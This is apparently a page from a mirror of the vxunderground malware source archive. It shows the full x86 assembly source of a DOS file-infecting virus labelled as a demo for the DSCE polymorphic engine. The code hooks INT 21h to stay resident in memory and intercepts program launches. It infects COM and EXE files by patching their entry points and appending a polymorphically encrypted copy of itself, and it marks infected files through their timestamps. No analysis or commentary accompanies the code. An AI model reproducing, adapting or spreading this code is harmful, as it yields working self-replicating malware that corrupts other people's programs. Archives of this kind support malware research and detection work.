mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
451 lines
12 KiB
NASM
451 lines
12 KiB
NASM
|
; A DEMO VIRUS FOR DSCE BY [PF]
|
||
|
.286
|
||
|
|
||
|
DEMO SEGMENT
|
||
|
ASSUME CS:DEMO,DS:DEMO
|
||
|
ORG 0000
|
||
|
|
||
|
VIR_LEN EQU OFFSET DSCE_END
|
||
|
|
||
|
EXTRN DSCE:NEAR,DSCE_END:NEAR
|
||
|
|
||
|
START: CALL BEG
|
||
|
|
||
|
BEG PROC
|
||
|
BEG ENDP
|
||
|
|
||
|
CLD
|
||
|
MOV AH,62H
|
||
|
INT 21H
|
||
|
MOV ES,BX
|
||
|
POP AX
|
||
|
SUB AX,3
|
||
|
SHR AX,4
|
||
|
MOV DX,CS
|
||
|
ADD AX,DX
|
||
|
PUSH AX
|
||
|
PUSH OFFSET CHK_MEMVIR
|
||
|
RETF
|
||
|
CHK_MEMVIR: PUSH CS
|
||
|
POP DS
|
||
|
MOV AX,4BDDH
|
||
|
INT 21H
|
||
|
CMP AX,0DD4BH
|
||
|
JZ RUN_OLD
|
||
|
MOV PSP_1,ES
|
||
|
MOV PSP_2,ES
|
||
|
MOV PSP_3,ES
|
||
|
MOV BX,VIR_LEN
|
||
|
MOV WORD PTR [BX],0A4F3H
|
||
|
MOV BYTE PTR [BX+2],0CBH
|
||
|
XOR DI,DI
|
||
|
MOV SI,DI
|
||
|
MOV AX,ES
|
||
|
ADD AX,10H
|
||
|
MOV ES,AX
|
||
|
MOV CX,VIR_LEN
|
||
|
PUSH ES
|
||
|
MOV AX,OFFSET CON
|
||
|
PUSH AX
|
||
|
CLD
|
||
|
JMP BX
|
||
|
|
||
|
RUN_OLD: PUSH ES
|
||
|
POP DS
|
||
|
CMP CS:FILE_MODE,0
|
||
|
JNZ RUN_EXE
|
||
|
MOV AX,CS:COM_HEAD1
|
||
|
MOV DS:[0100H],AX
|
||
|
MOV AH,CS:COM_HEAD2
|
||
|
MOV DS:[0102H],AH
|
||
|
MOV AX,0100H
|
||
|
MOV SP,0FFFEH
|
||
|
PUSH DS
|
||
|
PUSH AX
|
||
|
RETF
|
||
|
RUN_EXE: MOV AX,ES
|
||
|
ADD AX,10H
|
||
|
ADD CS:EXE_SS,AX
|
||
|
ADD CS:EXE_CS,AX
|
||
|
CLI
|
||
|
MOV SS,CS:EXE_SS
|
||
|
MOV SP,CS:EXE_SP
|
||
|
STI
|
||
|
JMP DWORD PTR CS:EXE_IP
|
||
|
|
||
|
RUN_OLD_M2: MOV AX,CS
|
||
|
MOV BX,VIR_LEN
|
||
|
ADD BX,200H
|
||
|
CLI
|
||
|
MOV SS,AX
|
||
|
MOV SP,BX
|
||
|
STI
|
||
|
MOV AH,4AH
|
||
|
MOV BX,VIR_LEN
|
||
|
ADD BX,BX
|
||
|
SHR BX,4
|
||
|
ADD BX,200H
|
||
|
MOV ES,PSP_1
|
||
|
INT 21H
|
||
|
MOV ES,ES:[2CH]
|
||
|
XOR DI,DI
|
||
|
XOR AX,AX
|
||
|
MOV CX,0FFFFH
|
||
|
GET_NAME: REPNZ SCASB
|
||
|
CMP AL,ES:[DI]
|
||
|
LOOPNZ GET_NAME
|
||
|
ADD DI,3
|
||
|
MOV RUN_DX,DI
|
||
|
MOV RUN_DS,ES
|
||
|
PUSH CS
|
||
|
POP ES
|
||
|
MOV AX,4B00H
|
||
|
MOV BX,OFFSET PCB
|
||
|
LDS DX,DWORD PTR CS:RUN_DX
|
||
|
INT 21H
|
||
|
|
||
|
MOV AH,4DH
|
||
|
INT 21H
|
||
|
MOV AH,31H
|
||
|
MOV DX,VIR_LEN
|
||
|
ADD DX,DX
|
||
|
SHR DX,4
|
||
|
ADD DX,0F0H
|
||
|
INT 21H
|
||
|
|
||
|
CON: PUSH CS
|
||
|
POP DS
|
||
|
MOV AX,3521H
|
||
|
INT 21H
|
||
|
MOV INT21_IP,BX
|
||
|
MOV INT21_CS,ES
|
||
|
MOV DX,OFFSET INT21
|
||
|
MOV AX,2521H
|
||
|
INT 21H
|
||
|
JMP RUN_OLD_M2
|
||
|
|
||
|
INT21_IP DW ?
|
||
|
INT21_CS DW ?
|
||
|
INT24_IP DW ?
|
||
|
INT24_CS DW ?
|
||
|
RUN_DX DW ?
|
||
|
RUN_DS DW ?
|
||
|
COM_HEAD1 DW 20CDH
|
||
|
COM_HEAD2 DB ?
|
||
|
|
||
|
EXE_HEAD DW ?
|
||
|
EXE_02H DW ?
|
||
|
EXE_04H DW ?
|
||
|
DW ?
|
||
|
EXE_08H DW ?
|
||
|
DW 2 DUP(?)
|
||
|
EXE_SS DW ?
|
||
|
EXE_SP DW ?
|
||
|
DW ?
|
||
|
EXE_IP DW ?
|
||
|
EXE_CS DW ?
|
||
|
|
||
|
NEW_SIZE_L DW ?
|
||
|
NEW_SIZE_H DW ?
|
||
|
|
||
|
PCB DW 0
|
||
|
DW 80H
|
||
|
PSP_1 DW ?
|
||
|
DW 5CH
|
||
|
PSP_2 DW ?
|
||
|
DW 6CH
|
||
|
PSP_3 DW ?
|
||
|
|
||
|
PATH_DX DW ?
|
||
|
PATH_DS DW ?
|
||
|
DATE_CX DW ?
|
||
|
DATE_DX DW ?
|
||
|
|
||
|
FILE_MODE DB 0
|
||
|
FILE_ATR DW ?
|
||
|
FILE_LEN DW ?
|
||
|
|
||
|
POP_BUFFER DW ?
|
||
|
VIR_BUFFER DB 20H DUP (?)
|
||
|
|
||
|
SP_BUF DW ?
|
||
|
SS_BUF DW ?
|
||
|
|
||
|
VIR_MSG DB "This is a DSCE's Demo Virus written by [P.F]"
|
||
|
|
||
|
INT21: PUSHF
|
||
|
CLD
|
||
|
CALL INF_PUSH
|
||
|
CMP AX,4BDDH
|
||
|
JNZ I21_CON
|
||
|
CALL INF_POP
|
||
|
MOV AX,0DD4BH
|
||
|
POPF
|
||
|
IRET
|
||
|
|
||
|
I21_CON: CMP AX,4B00H
|
||
|
JZ I21_RUN
|
||
|
I21_END: CALL INF_POP
|
||
|
POPF
|
||
|
JMP DWORD PTR CS:INT21_IP
|
||
|
I21_CLOSE: MOV AH,3EH
|
||
|
INT 21H
|
||
|
JMP I21_END
|
||
|
I21_RUN: MOV CS:PATH_DS,DS
|
||
|
MOV CS:PATH_DX,DX
|
||
|
MOV AX,3D00H
|
||
|
INT 21H
|
||
|
I21_END_L1: JC I21_END
|
||
|
XCHG AX,BX
|
||
|
PUSH CS
|
||
|
POP DS
|
||
|
MOV AX,5700H
|
||
|
INT 21H
|
||
|
CMP DX,0C800H
|
||
|
JA I21_CLOSE
|
||
|
MOV DATE_CX,CX
|
||
|
MOV DATE_DX,DX
|
||
|
MOV AH,3FH
|
||
|
MOV CX,3
|
||
|
MOV DX,OFFSET COM_HEAD1
|
||
|
INT 21H
|
||
|
CMP AX,CX
|
||
|
JNZ I21_CLOSE
|
||
|
CMP COM_HEAD1,4D5AH
|
||
|
JZ SET_MODE
|
||
|
CMP COM_HEAD1,5A4DH
|
||
|
JNZ SET_M_COM
|
||
|
SET_MODE: MOV FILE_MODE,1
|
||
|
MOV AX,4200H
|
||
|
XOR CX,CX
|
||
|
XOR DX,DX
|
||
|
INT 21H
|
||
|
MOV AH,3FH
|
||
|
MOV CX,18H
|
||
|
MOV DX,OFFSET EXE_HEAD
|
||
|
INT 21H
|
||
|
JMP SHORT I21_OPEN
|
||
|
SET_M_COM: MOV FILE_MODE,0
|
||
|
MOV AX,4202H
|
||
|
XOR CX,CX
|
||
|
XOR DX,DX
|
||
|
INT 21H
|
||
|
OR DX,DX
|
||
|
JNZ I21_CLOSE
|
||
|
CMP AX,0C000H
|
||
|
JA I21_CLOSE
|
||
|
MOV FILE_LEN,AX
|
||
|
I21_OPEN: MOV AH,3EH
|
||
|
INT 21H
|
||
|
PUSH PATH_DX
|
||
|
PUSH PATH_DS
|
||
|
POP DS
|
||
|
POP DX
|
||
|
MOV AX,4300H
|
||
|
INT 21H
|
||
|
JC I21_END_L1
|
||
|
MOV CS:FILE_ATR,CX
|
||
|
MOV AX,4301H
|
||
|
XOR CX,CX
|
||
|
INT 21H
|
||
|
MOV AX,3D02H
|
||
|
INT 21H
|
||
|
JC I21_END_L2
|
||
|
XCHG AX,BX
|
||
|
PUSH CS
|
||
|
POP DS
|
||
|
PUSH BX
|
||
|
MOV AX,3524H
|
||
|
INT 21H
|
||
|
MOV INT24_IP,BX
|
||
|
MOV INT24_CS,ES
|
||
|
MOV AX,2524H
|
||
|
MOV DX,OFFSET INT24
|
||
|
INT 21H
|
||
|
POP BX
|
||
|
CALL WRITE
|
||
|
MOV AH,3EH
|
||
|
INT 21H
|
||
|
MOV AX,2524H
|
||
|
PUSH INT24_IP
|
||
|
PUSH INT24_CS
|
||
|
POP DS
|
||
|
POP DX
|
||
|
INT 21H
|
||
|
PUSH CS:PATH_DX
|
||
|
PUSH CS:PATH_DS
|
||
|
POP DS
|
||
|
POP DX
|
||
|
MOV AX,4301H
|
||
|
MOV CX,CS:FILE_ATR
|
||
|
INT 21H
|
||
|
I21_END_L2: JMP I21_END
|
||
|
|
||
|
INT24: XOR AL,AL
|
||
|
IRET
|
||
|
|
||
|
WRITE PROC
|
||
|
MOV SP_BUF,SP
|
||
|
MOV SS_BUF,SS
|
||
|
MOV AX,VIR_LEN + 5DCH
|
||
|
MOV DX,CS
|
||
|
CLI
|
||
|
MOV SS,DX
|
||
|
MOV SP,AX
|
||
|
STI
|
||
|
CMP FILE_MODE,0
|
||
|
JZ WRITE_COM
|
||
|
JMP SHORT WRITE_EXE
|
||
|
WRITE_COM: MOV SI,OFFSET VIR_BUFFER
|
||
|
MOV BYTE PTR [SI],0E9H
|
||
|
MOV AX,FILE_LEN
|
||
|
PUSH AX
|
||
|
SUB AX,3
|
||
|
MOV [SI+1],AX
|
||
|
MOV AX,4200H
|
||
|
XOR CX,CX
|
||
|
XOR DX,DX
|
||
|
INT 21H
|
||
|
MOV AH,40H
|
||
|
MOV DX,SI
|
||
|
MOV CX,3
|
||
|
INT 21H
|
||
|
MOV AX,4202H
|
||
|
XOR CX,CX
|
||
|
XOR DX,DX
|
||
|
INT 21H
|
||
|
MOV AX,VIR_LEN + 600H
|
||
|
MOV DX,CS
|
||
|
SHR AX,4
|
||
|
INC AX
|
||
|
ADD AX,DX
|
||
|
MOV ES,AX
|
||
|
MOV DX,OFFSET START
|
||
|
MOV CX,VIR_LEN
|
||
|
POP BP
|
||
|
ADD BP,0100H
|
||
|
PUSH BX
|
||
|
MOV BL,10B
|
||
|
|
||
|
CALL DSCE
|
||
|
|
||
|
POP BX
|
||
|
MOV AH,40H
|
||
|
INT 21H
|
||
|
PUSH CS
|
||
|
POP DS
|
||
|
|
||
|
SET_DATE: MOV AX,5701H
|
||
|
MOV CX,DATE_CX
|
||
|
MOV DX,DATE_DX
|
||
|
ADD DX,0C800H
|
||
|
INT 21H
|
||
|
MOV AX,SP_BUF
|
||
|
MOV DX,SS_BUF
|
||
|
CLI
|
||
|
MOV SS,DX
|
||
|
MOV SP,AX
|
||
|
STI
|
||
|
RET
|
||
|
|
||
|
WRITE_EXE: PUSH CS
|
||
|
POP ES
|
||
|
MOV SI,OFFSET EXE_HEAD
|
||
|
MOV DI,OFFSET VIR_BUFFER
|
||
|
MOV CX,18H
|
||
|
REP MOVSB
|
||
|
MOV AX,4202H
|
||
|
XOR CX,CX
|
||
|
XOR DX,DX
|
||
|
INT 21H
|
||
|
ADD AX,0FH
|
||
|
ADC DX,0
|
||
|
AND AX,0FFF0H
|
||
|
MOV NEW_SIZE_L,AX
|
||
|
MOV NEW_SIZE_H,DX
|
||
|
MOV CX,10H
|
||
|
DIV CX
|
||
|
MOV DI,OFFSET VIR_BUFFER
|
||
|
SUB AX,[DI+8]
|
||
|
MOV [DI+16H],AX
|
||
|
MOV [DI+0EH],AX
|
||
|
MOV WORD PTR [DI+14H],0
|
||
|
MOV [DI+10H],0FFFEH
|
||
|
MOV AX,4200H
|
||
|
MOV DX,NEW_SIZE_L
|
||
|
MOV CX,NEW_SIZE_H
|
||
|
INT 21H
|
||
|
MOV AX,VIR_LEN + 600H
|
||
|
MOV DX,CS
|
||
|
SHR AX,4
|
||
|
INC AX
|
||
|
ADD AX,DX
|
||
|
MOV ES,AX
|
||
|
MOV DX,OFFSET START
|
||
|
MOV CX,VIR_LEN
|
||
|
MOV BP,0
|
||
|
PUSH BX
|
||
|
MOV BL,11B
|
||
|
|
||
|
CALL DSCE
|
||
|
|
||
|
POP BX
|
||
|
MOV AH,40H
|
||
|
INT 21H
|
||
|
PUSH CS
|
||
|
POP DS
|
||
|
|
||
|
MOV AX,NEW_SIZE_L
|
||
|
MOV DX,NEW_SIZE_H
|
||
|
ADD AX,CX
|
||
|
ADC DX,0
|
||
|
MOV CX,200H
|
||
|
MOV DI,OFFSET VIR_BUFFER
|
||
|
DIV CX
|
||
|
OR DX,DX
|
||
|
JZ GET_NEW
|
||
|
INC AX
|
||
|
GET_NEW: MOV [DI+4],AX
|
||
|
MOV [DI+2],DX
|
||
|
MOV AX,4200H
|
||
|
XOR CX,CX
|
||
|
XOR DX,DX
|
||
|
INT 21H
|
||
|
MOV AH,40H
|
||
|
MOV CX,18H
|
||
|
MOV DX,DI
|
||
|
INT 21H
|
||
|
JMP SET_DATE
|
||
|
WRITE ENDP
|
||
|
|
||
|
INF_PUSH PROC
|
||
|
POP CS:POP_BUFFER
|
||
|
PUSH AX
|
||
|
PUSH BX
|
||
|
PUSH CX
|
||
|
PUSH DX
|
||
|
PUSH SI
|
||
|
PUSH DI
|
||
|
PUSH BP
|
||
|
PUSH DS
|
||
|
PUSH ES
|
||
|
JMP CS:POP_BUFFER
|
||
|
INF_PUSH ENDP
|
||
|
|
||
|
INF_POP PROC
|
||
|
POP CS:POP_BUFFER
|
||
|
POP ES
|
||
|
POP DS
|
||
|
POP BP
|
||
|
POP DI
|
||
|
POP SI
|
||
|
POP DX
|
||
|
POP CX
|
||
|
POP BX
|
||
|
POP AX
|
||
|
JMP CS:POP_BUFFER
|
||
|
INF_POP ENDP
|
||
|
|
||
|
DEMO ENDS
|
||
|
END START
|